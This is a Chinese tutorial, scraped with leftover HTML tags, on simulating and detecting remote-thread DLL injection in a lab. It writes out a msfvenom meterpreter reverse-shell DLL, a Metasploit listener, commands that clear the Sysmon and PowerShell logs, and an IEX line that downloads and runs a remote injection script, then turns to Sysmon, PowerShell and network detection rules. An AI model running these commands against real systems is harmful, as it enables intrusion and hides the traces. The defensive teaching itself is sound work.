DLL注入的术与道：攻击手法与检测规则详解<\/h1>

1. 基本概念<\/h2>

1.1 什么是DLL？<\/h3>
DLL（Dynamic Link Library）本质上是可供其他程序使用的函数和数据的集合，可视为虚拟公共资源。Windows运行的任何程序都会不断地调用动态链接库，以访问各种常见函数和数据。<\/p>

1.2 DLL注入（T1055.001）<\/h3>

参考ATT&CK攻击矩阵，进程注入的方法比较丰富。本次使用经典的远程线程注入方法，对应ATT&CK的T1055.001。该方法需要事先将DLL存于磁盘上，主要流程如下：<\/p>

使用Windows API调用将恶意文件路径写入目标进程的虚拟地址空间<\/li>

创建远程线程并执行<\/li> <\/ol>

2. 环境构建<\/h2>

2.1 系统准备<\/h3>

Windows 10（victim）<\/li>
Kali（攻击机）<\/li>

Ubuntu 22.04.2（日志分析）<\/li> <\/ul>

2.2 工具安装<\/h3>

Sysmon<\/strong>：安装时务必指定配置文件（如Neo23x0-sysmon-config）<\/p>

安装后验证：Get-Service sysmon<\/code><\/li> <\/ul> <\/li>
PowerShell ScriptBlock日志<\/strong>配置：<\/p> Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope LocalMachine <\/span><\/span>New-Item -Path HKLM:<\/span>\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging -Force <\/span><\/span>New-ItemProperty -Path HKLM:<\/span>\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging -Name EnableScriptBlockLogging -Value 1 -PropertyType DWord -Force <\/span><\/span>wevtutil sl "Microsoft-Windows-PowerShell\/Operational"<\/span> \/e:true <\/span><\/span><\/code><\/pre><\/li> 其他工具：<\/p> Process Hacker：实时分析<\/li> Wireshark：流量分析<\/li> Volatility：内存分析<\/li> <\/ul> <\/li> <\/ol> 3. 攻击模拟<\/h2> 3.1 生成DLL文件<\/h3> 在Kali上使用msfvenom生成payload：<\/p> sudo msfvenom -p windows\/meterpreter\/reverse_tcp Lhost=<\/span>192.168.26.130 Lport=<\/span>88<\/span> -f dll > \/home\/hacker\/Desktop\/evil.dll <\/span><\/span><\/code><\/pre>3.2 传输DLL到目标<\/h3> 使用Python搭建简易HTTP服务器：<\/p> python3 -m http.server 8008<\/span> <\/span><\/span><\/code><\/pre>3.3 启动监听<\/h3> 在Kali上：<\/p> msfconsole <\/span><\/span>use exploit\/multi\/handler <\/span><\/span>set payload windows\/meterpreter\/reverse_tcp <\/span><\/span>set LHOST 192.168.230.155 <\/span><\/span>set LPORT 88<\/span> <\/span><\/span>run <\/span><\/span><\/code><\/pre>3.4 执行注入<\/h3> 清除系统日志：<\/p> wevtutil cl "Microsoft-Windows-Sysmon\/Operational"<\/span> <\/span><\/span>wevtutil cl "Microsoft-Windows-PowerShell\/Operational"<\/span> <\/span><\/span><\/code><\/pre><\/li> 下载并执行PowerShell注入脚本：<\/p> IEX (New-Object Net.WebClient).DownloadString('https:\/\/raw.githubusercontent.com\/faanross\/threat.hunting.course.01.resources\/main\/Invoke-DllInjection-V2.ps1'<\/span>) <\/span><\/span><\/code><\/pre><\/li> 注入恶意DLL（以rufus.exe为例）：<\/p> Invoke-DllInjection -ProcessID 1480 -Dll C:\Users\admin\Desktop\evil.dll <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4. 技术原理分析<\/h2> 4.1 DLL注入流程<\/h3> 搜索目标进程<\/strong>：<\/p> 使用CreateToolhelp32Snapshot<\/code>枚举进程<\/li> Process32First<\/code>和Process32Next<\/code>迭代进程列表<\/li> <\/ul> <\/li> 获取进程句柄<\/strong>：<\/p> OpenProcess(ProcessAccessFlags.All = 0x001F0FFF<\/span>) <\/span><\/span><\/code><\/pre><\/li> 分配内存<\/strong>：<\/p> VirtualAllocEx(目标进程句柄<\/span>, 分配大小<\/span>, 内存地址<\/span>, 分配类型<\/span>, 访问权限<\/span>) <\/span><\/span><\/code><\/pre><\/li> 写入DLL路径<\/strong>：<\/p> WriteProcessMemory(目标进程句柄<\/span>, 内存地址<\/span>, 数据<\/span>, 数据大小<\/span>) <\/span><\/span><\/code><\/pre><\/li> 创建远程线程<\/strong>：<\/p> 使用RtlCreateUserThread<\/code>、NtCreateThreadEx<\/code>或CreateRemoteThread<\/code><\/li> 将线程执行地址设置为LoadLibraryA<\/code>函数地址<\/li> <\/ul> <\/li> <\/ol> 4.2 恶意DLL分析<\/h3> 使用IDA Pro分析evil.dll，主要函数：<\/p> sub_10001000<\/code><\/li> sub_10001050<\/code>（核心功能：进程创建与网络连接）<\/li> sub_100011A0<\/code><\/li> DllEntryPoint<\/code>（导出函数）<\/li> <\/ul> 关键行为：<\/p> 初始化进程启动所需变量（StartupInfo、IpProcessInformation结构体）<\/li> 创建rundll32.exe进程<\/li> 调用WriteProcessMemory<\/code>将数据写入目标进程内存<\/li> 使用WSASocket<\/code>实现联网行为<\/li> <\/ol> 5. 检测与分析<\/h2> 5.1 原生工具检测<\/h3> 网络连接分析<\/strong>：<\/p> netstat -naob <\/span><\/span><\/code><\/pre>重点关注：<\/p> ESTABLISHED连接<\/li> rundll32.exe发起的异常网络连接<\/li> <\/ul> <\/li> 进程信息分析<\/strong>：<\/p> tasklist \/m \/fi "pid eq [PID]"<\/span> <\/span><\/span>wmic process<\/span> where processid=[PID]<\/span> get parentprocessid <\/span><\/span>wmic process<\/span> where processid=[PID]<\/span> get Name <\/span><\/span>wmic process<\/span> where processid=[PID]<\/span> get commandline <\/span><\/span><\/code><\/pre><\/li> Process Hacker分析<\/strong>：<\/p> 进程树关系异常（如rufus.exe → rundll32.exe → cmd.exe）<\/li> 当前工作目录异常（如从桌面运行）<\/li> 无命令行参数运行<\/li> RWX内存权限<\/li> 内存中包含PE文件特征（MZ头）<\/li> <\/ul> <\/li> <\/ol> 5.2 Sysmon日志分析<\/h3> 关键事件ID：<\/p> ID 22<\/strong>：DNS查询（如raw.githubusercontent.com）<\/li> ID 3<\/strong>：网络连接（rundll32回连攻击机）<\/li> ID 13\/12<\/strong>：注册表修改（DisableAntiSpyware）<\/li> ID 1<\/strong>：进程创建（如raserver.exe启动）<\/li> <\/ul> 5.3 PowerShell日志分析<\/h3> 关键特征：<\/p> 事件ID 4104<\/li> 从Web服务器下载脚本并注入内存的命令<\/li> 注入恶意DLL的命令记录<\/li> <\/ul> 5.4 流量分析<\/h3> 关键点：<\/p> DNS请求与响应<\/li> TLS加密交换<\/li> TCP流中的PE文件特征（MZ头）<\/li> <\/ul> 6. 检测规则<\/h2> 6.1 基本规则<\/h3> rundll32.exe异常使用<\/strong>：<\/p> 合法路径应为： C:\Windows\System32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe <\/code><\/pre> <\/li> 检测非标准路径下的rundll32.exe<\/li> <\/ul> <\/li> 命令行参数异常<\/strong>：<\/p> 缺少DLL路径和函数参数<\/li> 从异常位置（如%temp%、桌面）加载DLL<\/li> <\/ul> <\/li> 父子进程关系异常<\/strong>：<\/p> 如rufus.exe → rundll32.exe → cmd.exe<\/li> 结合进程启动日志建立行为序列<\/li> <\/ul> <\/li> <\/ol> 6.2 高级规则<\/h3> 内存权限检测<\/strong>：<\/p> 检测具有RWX权限的内存空间<\/li> 检测内存中的PE文件特征<\/li> <\/ul> <\/li> 网络行为检测<\/strong>：<\/p> rundll32.exe的网络通信行为（正常情况下不活跃）<\/li> 结合源IP、目的IP进行分桶聚合分析<\/li> <\/ul> <\/li> 注册表修改检测<\/strong>：<\/p> 对DisableAntiSpyware等安全相关注册表项的修改<\/li> HKLM和HKU下的异常修改<\/li> <\/ul> <\/li> <\/ol> 7. 防御建议<\/h2> 应用白名单<\/strong>：限制rundll32.exe等工具的执行<\/li> 权限控制<\/strong>：限制普通用户对关键注册表项的修改权限<\/li> 日志监控<\/strong>：全面启用Sysmon和PowerShell日志<\/li> 行为分析<\/strong>：建立正常行为基线，检测异常行为模式<\/li> 内存保护<\/strong>：启用防篡改和内存保护机制<\/li> <\/ol> 8. 总结<\/h2> DLL注入是一种常见的攻击技术，攻击者通过将恶意代码注入合法进程来绕过安全检测。防御者需要：<\/p> 理解DLL注入的技术原理和实现方式<\/li> 掌握多种检测方法（日志分析、内存分析、网络分析等）<\/li> 建立全面的检测规则和防御体系<\/li> 持续监控和更新防御策略以应对新的变种<\/li> <\/ol> 通过深入理解攻击手法和建立有效的检测规则，可以显著提高对DLL注入攻击的检测和防御能力。<\/p>

DLL注入的术与道：攻击手法与检测规则详解<\/h1>

1. 基本概念<\/h2>

1.1 什么是DLL？<\/h3> DLL（Dynamic Link Library）本质上是可供其他程序使用的函数和数据的集合，可视为虚拟公共资源。Windows运行的任何程序都会不断地调用动态链接库，以访问各种常见函数和数据。<\/p>

2. 环境构建<\/h2>

3. 攻击模拟<\/h2>

4. 技术原理分析<\/h2>

5. 检测与分析<\/h2>

6. 检测规则<\/h2>

1.1 什么是DLL？<\/h3>
DLL（Dynamic Link Library）本质上是可供其他程序使用的函数和数据的集合，可视为虚拟公共资源。Windows运行的任何程序都会不断地调用动态链接库，以访问各种常见函数和数据。<\/p>